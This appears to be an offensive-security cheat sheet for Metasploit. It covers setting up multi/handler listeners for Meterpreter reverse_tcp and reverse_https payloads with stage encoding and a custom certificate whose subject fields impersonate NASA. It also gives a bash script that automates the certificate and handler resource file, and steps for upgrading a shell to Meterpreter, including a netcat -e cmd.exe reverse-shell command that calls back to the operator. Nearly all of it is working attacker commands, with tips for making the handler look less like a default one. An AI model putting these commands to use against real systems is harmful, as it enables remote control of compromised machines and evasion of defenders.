Listeners

- Listener

  • Syntax

use exploit/multi/handler

set PAYLOAD <PAYLOAD>

set LHOST <LHOST>

set LPORT <LPORT>

set ExitOnSession false

exploit -j -z

  • HTTPS Listener with stage encoding (the second stage is encoded before it is sent over the TLS channel)

use exploit/multi/handler

set LHOST <LHOST>

set LPORT <LPORT>

set payload windows/x64/meterpreter/reverse_https

set EnableStageEncoding true

set StageEncoder x64/zutto_dekiru

exploit

  • To start a listener as a job while in another session (background the current session first, then launch the handler as a job):

background

exploit -j

  • To directly load a listener from the command line (-q skips the banner, -x runs the semicolon-separated commands):

msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST <LHOST>; set LPORT 443; set EXITFUNC thread; run'

msfconsole -q -x 'use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <LHOST>; set LPORT 443; set EXITFUNC thread; run'

  • To add a custom certificate to an HTTPS handler (by default Metasploit generates a random self-signed certificate on every start; a fixed one lets the payload pin it and looks less like a default handler):

openssl req -new -x509 -nodes -out cert.crt -keyout priv.key

Answer the interactive prompts (Country, State, Locality, Organization, Organizational Unit, Common Name, Email), for example:

US
TX
Houston
NASA
JSC
nasa.gov
info@nasa.gov

Metasploit expects the private key and the certificate concatenated into a single PEM file, key first:

cat priv.key cert.crt > nasa.pem

On Kali/Debian the system OpenSSL config pins a security level (CipherString = DEFAULT@SECLEVEL=2 in the [system_default_sect] section), which can make the handler refuse to negotiate with older Windows TLS clients. If that happens, edit /etc/ssl/openssl.cnf and drop the @SECLEVEL suffix so the line reads:

nano /etc/ssl/openssl.cnf

CipherString=DEFAULT

set HandlerSSLCert /home/kali/self_cert/nasa.pem

exploit
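The certificate steps above can be scripted so the cert is created non-interactively and the handler is started from a resource file instead of being typed in by hand. This is an added example, not part of the original notes; the function names make_handler_cert and write_handler_rc, the output directory and the 365-day validity are my own choices, and the subject fields reuse the example values from the notes:

```shell
#!/usr/bin/env bash
# Added example: build a self-signed cert for HandlerSSLCert without the
# interactive prompts, and emit a resource script for exploit/multi/handler.
set -e

make_handler_cert() {
  # $1 = output directory, $2 = Common Name (hypothetical helper)
  local dir="$1" cn="$2"
  mkdir -p "$dir"
  # -subj supplies the same answers the interactive prompts would ask for
  openssl req -new -x509 -nodes -days 365 -newkey rsa:2048 \
    -subj "/C=US/ST=TX/L=Houston/O=NASA/OU=JSC/CN=${cn}/emailAddress=info@${cn}" \
    -keyout "$dir/priv.key" -out "$dir/cert.crt" 2>/dev/null
  # Metasploit wants key and certificate in one PEM file, key first
  cat "$dir/priv.key" "$dir/cert.crt" > "$dir/${cn}.pem"
  chmod 600 "$dir/priv.key" "$dir/${cn}.pem"
  printf '%s\n' "$dir/${cn}.pem"
}

write_handler_rc() {
  # $1 = PEM path, $2 = LHOST, $3 = LPORT, $4 = resource file to write
  # Mirrors the handler settings used in the notes: background job,
  # stay listening after the first session, thread exit method.
  cat > "$4" <<EOF
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST $2
set LPORT $3
set HandlerSSLCert $1
set ExitOnSession false
set EXITFUNC thread
exploit -j -z
EOF
  printf '%s\n' "$4"
}

# Usage (values are placeholders):
#   pem=$(make_handler_cert "$HOME/self_cert" nasa.gov)
#   write_handler_rc "$pem" 10.0.0.5 443 "$HOME/self_cert/handler.rc"
#   msfconsole -q -r "$HOME/self_cert/handler.rc"
```

Start the handler with msfconsole -q -r handler.rc. Keep the .pem at mode 600: it carries the private key, and anyone who copies it can impersonate your handler to the implant.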

- To upgrade a normal shell to a meterpreter shell:

First we start exploit/multi/handler with a plain shell payload, e.g. generic/shell_reverse_tcp or windows/shell/reverse_tcp.

Then we trigger the reverse shell. If we already have a shell on the target, we upload netcat and connect back with: netcat.exe -e cmd.exe {My IP} {port}

Once the plain shell session opens in msfconsole, we send it to the background (CTRL + Z, then confirm with y).

We can check we have that active session with sessions -l

Then, to upgrade that session to a Meterpreter session (the post module starts its own handler, delivers a Meterpreter stager through the existing shell and opens a new session):

search shell_to_meterpreter

use post/multi/manage/shell_to_meterpreter

set SESSION 1 (check the session ID with sessions -l)

run

sessions -i 2 (the upgraded Meterpreter session gets a new ID; the original shell session stays open)

The same upgrade can be done in one step from the msf prompt with: sessions -u 1
